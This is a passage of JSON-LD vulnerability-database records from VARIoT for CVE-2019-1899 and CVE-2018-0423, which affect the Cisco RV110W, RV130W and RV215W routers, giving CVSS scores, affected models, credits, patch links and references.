              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines of Tenable, Inc. .",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-1899",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-1899",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-25712",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-151391",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1899",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1899",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-1899",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2019-1899",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-1899",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-25712",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-801",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-151391",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to acquire the list of devices that are connected to the guest network. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web interface of the router. The Cisco RV110W and so on are all VPN firewall routers from Cisco. \nAn attacker can exploit this issue to obtain sensitive information. This may lead to other attacks. \nThis issue is being tracked by the Cisco Bug IDs CSCvo65058, CSCvo65061 and CSCvo65062",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "BID",
            "id": "108867"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-1899",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108867",
            "trust": 2.6
          },
          {
            "db": "TENABLE",
            "id": "TRA-2019-29",
            "trust": 1.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2190",
            "trust": 1.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "db": "BID",
            "id": "108867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "id": "VAR-201906-0690",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:06:10.271000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20190619-rv-infodis",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-infodis"
          },
          {
            "title": "Patch for Cisco RV110W, RV130W, and RV215W Licensing Issue Vulnerabilities (CNVD-2019-25712)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/172971"
          },
          {
            "title": "Cisco RV110W , RV130W  and RV215W Routers Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93951"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-285",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-425",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.2,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
          },
          {
            "trust": 2.9,
            "url": "http://www.securityfocus.com/bid/108867"
          },
          {
            "trust": 1.7,
            "url": "https://www.tenable.com/security/research/tra-2019-29"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1899"
          },
          {
            "trust": 1.2,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
          },
          {
            "trust": 0.9,
            "url": "http://www.cisco.com/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1899"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "db": "BID",
            "id": "108867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "db": "BID",
            "id": "108867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108867"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "date": "2019-06-20T03:15:12.480000",
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "date": "2020-10-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151391"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108867"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "date": "2020-10-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          },
          {
            "date": "2024-11-21T04:37:38.757000",
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Vulnerabilities related to authorization in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-801"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201810-0301

    Vulnerability from variot - Updated: 2024-11-23 22:00

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products.

    A buffer overflow vulnerability exists in the management interfaces of many Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. This issue being tracked by Cisco Bug ID CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0301",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 2.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 2.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 1.2,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "*"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "*"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "*"
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "small business rv series routers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "small business rv series routers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv215w wireless-n vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.1.0.5"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.16"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv110w wireless-n vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.0.9"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "BID",
            "id": "105285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Qingtang Zheng of 360 ESG CodeSafe.",
        "sources": [
          {
            "db": "BID",
            "id": "105285"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-0423",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2018-0423",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-17682",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-18074",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-118625",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2018-0423",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-0423",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-0423",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-17682",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-18074",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201809-254",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-118625",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products. \n\nA buffer overflow vulnerability exists in the management interfaces of many Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. \nThis issue being tracked by Cisco Bug ID CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "BID",
            "id": "105285"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          }
        ],
        "trust": 3.06
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-0423",
            "trust": 4.0
          },
          {
            "db": "BID",
            "id": "105285",
            "trust": 2.0
          },
          {
            "db": "SECTRACK",
            "id": "1041675",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-17682"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18074"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118625"
          },
          {
            "db": "BID",
            "id": "105285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010561"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0423"
          }
        ]
      },
      "id": "VAR-201810-0301",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
